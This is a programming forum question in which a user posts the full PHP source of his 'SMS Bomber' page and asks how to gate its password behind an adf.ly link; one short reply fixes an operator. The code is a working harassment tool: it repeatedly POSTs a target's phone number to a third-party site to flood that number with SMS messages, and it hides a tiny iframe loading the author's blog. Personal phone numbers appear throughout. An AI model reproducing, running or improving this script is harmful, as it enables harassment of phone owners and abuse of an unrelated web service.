# How To auto Generate Code And Show with a Adf.ly link

Tags: javascript, php, passwords

Hy!
I am Ali And I want to such a script that generate random password for a other script
and also show pass after adf.ly link
http://bloghaider.com/18/

any one help me:( that is page code i want to set random password @ "pass1word"

```
<html>
<body><center>

<img src="http://www.bloghaider.com/wp-content/uploads/2013/10/a-1024x250.png"  width="333" height="302" />
<center><font size="4" face="arial" color="Red">
<h1 style="text-align:center;"><font 

style="text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 

0), 0px 0px 5px rgb(255, 0, 0); color: rgb(255, 255, 255); font-weight: 

bold;">Mr.Ali Hassan  SMS Bomber</font></H1>
<h1 


style="text-align:center;"><font style="text-shadow: 0px 0px 6px 

rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0), 0px 0px 5px rgb(255, 0, 0); 

color: rgb(255, 255, 255); font-weight: bold;">Working Only Warid number, Jazz number, Zong Number, Ufone, Telenor <br>to get pass Contact @ 03356105927
</font></H1> <title>Design by Ali Hassan   </title>

<h2> Get Password<a href="" target="_blank"> Click Here </a>
</h2>
<?php
if(isset($_POST['number'])) {
 $pass = $_POST['password'];
 $num = $_POST['number'];
 $bmb = $_POST['bombs'];
   // Passwords Start Here.....!!
 if ($pass == "pass1word" or $pass == "kcp") {
 echo "Pass Success....!!"; 
 }
 else {
 echo "Wrong Password....!!Contact : 03356105927 ";
exit;
}
// Passwords End Here....!!
   if ($num == "+923068766025") {
 echo "SoOry,I am unable to do this task...:(";
 exit;
 }
  if ($num == "923356105926") {
 echo "Baap Sy Panga.....Hehehe.....:D Not Changa ";
 exit;
 }
   if ($num == "03356105927") {
 echo "SoOry,I am unable to do this task...:(";
 exit;
 }
   if ($num == "+923356105926") {
 echo "SoOry,I am unable to do this task...:(";
 exit;
 }
  if ($num == "923356105926") {
 echo "Baap Sy Panga.....Hehehe.....:D";
 exit;
 }
$i=1;
echo "Bomb.!!!!   " . $num . "  ";


while($i<=$bmb) {
        //close connection
       // curl_close($ch);


// $proxy = '127.0.0.1:8118';
 $LOGINURL = "http://www.nowcheerup.me/index.php";
    $POSTFIELDS = 'number=%2B' . $num . '&submit=Cheer+Up+Time%21';
    $reffer = "http://www.nowcheerup.me/index.php";
$agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0";
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL,$LOGINURL);
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt($ch, CURLOPT_POST, 1); 
    curl_setopt($ch, CURLOPT_POSTFIELDS,$POSTFIELDS); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    // curl_setopt($ch,CURLOPT_COOKIEJAR, "cookie.txt");
        curl_setopt($ch,CURLOPT_COOKIEFILE, "cookie.txt");
     //   curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);  // this will force to del old cookies and renew and use :P
    curl_setopt($ch, CURLOPT_REFERER, $reffer); 
  // curl_exec ($ch);
    //curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
        //execute post
       curl_exec ($ch);

      //  print_r(curl_error($ch));
       // print_r(curl_getinfo($ch));
        // print_r(curl_errno($ch));
  echo $i . ", ";
  $i++;
  }
        //close connection
       // curl_close($ch);  
}
?>
<?php
echo '<form name="mainform" method="POST" type="form" action="">';
?>
<br />
<p align="center">
<font color="#FF0000">Password Here : </font> <br/>
<input type="password" name="password" id="password" value="password"
style="text-align: center" size="20" />
<br />
<br />
<font color="#FF0000">Number Here : <br/></font>
<input type="text" name="number" id="number" maxlength="50" value="923356105926" title="write number in this formate 923337699145" style="text-align: center" size="20" />
<br />
<br />
<font color="#FF0000">Amount Here :             <br/> </font> 
<input type="text" name="bombs" id="bombs" value="10" maxlength="4" style="text-align: center" size="20" />
<br/>
<br/>
<input type="submit" name="submit" value="BomB" /><Font color="white" <iframe width="001" height="001" src="http://www.bloghaider.com/"></iframe> </font>
<p style="text-align: center;">If It Don't works <a href="">Click Here</a></p>
```

Answer (score 0):

maybe to late, but you need to change `or` to `||`. That's all what was wrong.